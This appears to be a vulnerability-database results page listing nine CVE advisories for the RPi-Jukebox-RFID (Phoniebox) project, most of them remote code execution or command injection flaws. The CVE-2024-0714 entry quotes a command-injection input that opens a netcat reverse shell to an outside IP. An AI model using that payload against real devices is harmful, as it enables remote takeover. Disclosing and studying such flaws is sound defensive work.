Show filters
9 Total Results
Displaying 1-9 of 9
Sort by:
Attacker Value
Unknown
CVE-2024-41369
Disclosure Date: August 29, 2024 (last updated September 05, 2024)
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\inc.setWifi.php
0
Attacker Value
Unknown
CVE-2024-41368
Disclosure Date: August 29, 2024 (last updated September 05, 2024)
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\inc.setWlanIpMail.php
0
Attacker Value
Unknown
CVE-2024-41367
Disclosure Date: August 29, 2024 (last updated September 05, 2024)
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\api\playlist\appendFileToPlaylist.php
0
Attacker Value
Unknown
CVE-2024-41366
Disclosure Date: August 29, 2024 (last updated September 05, 2024)
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\userScripts.php
0
Attacker Value
Unknown
CVE-2024-41364
Disclosure Date: August 29, 2024 (last updated September 05, 2024)
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\trackEdit.php
0
Attacker Value
Unknown
CVE-2024-41361
Disclosure Date: August 29, 2024 (last updated September 05, 2024)
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\manageFilesFolders.php
0
Attacker Value
Unknown
CVE-2024-3799
Disclosure Date: July 10, 2024 (last updated July 12, 2024)
Insecure handling of POST header parameter body included in requests being sent to an instance of the open-source project Phoniebox allows an attacker to create a website, which – when visited by a user – will send malicious requests to multiple hosts on the local network. If such a request reaches the server, it will cause a shell command execution.
This issue affects Phoniebox in all releases through 2.7. Newer 2.x releases were not tested, but they might also be vulnerable.
Phoniebox in version 3.0 and higher are not affected.
0
Attacker Value
Unknown
CVE-2024-3798
Disclosure Date: July 10, 2024 (last updated July 12, 2024)
Insecure handling of GET header parameter file included in requests being sent to an instance of the open-source project Phoniebox allows an attacker to create a website, which – when visited by a user – will send malicious requests to multiple hosts on the local network. If such a request reaches the server, it will cause one of the following (depending on the chosen payload): shell command execution, reflected XSS or cross-site request forgery.
This issue affects Phoniebox in all releases through 2.7. Newer 2.x releases were not tested, but they might also be vulnerable.
Phoniebox in version 3.0 and higher are not affected.
0
Attacker Value
Unknown
CVE-2024-0714
Disclosure Date: January 19, 2024 (last updated January 27, 2024)
A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
0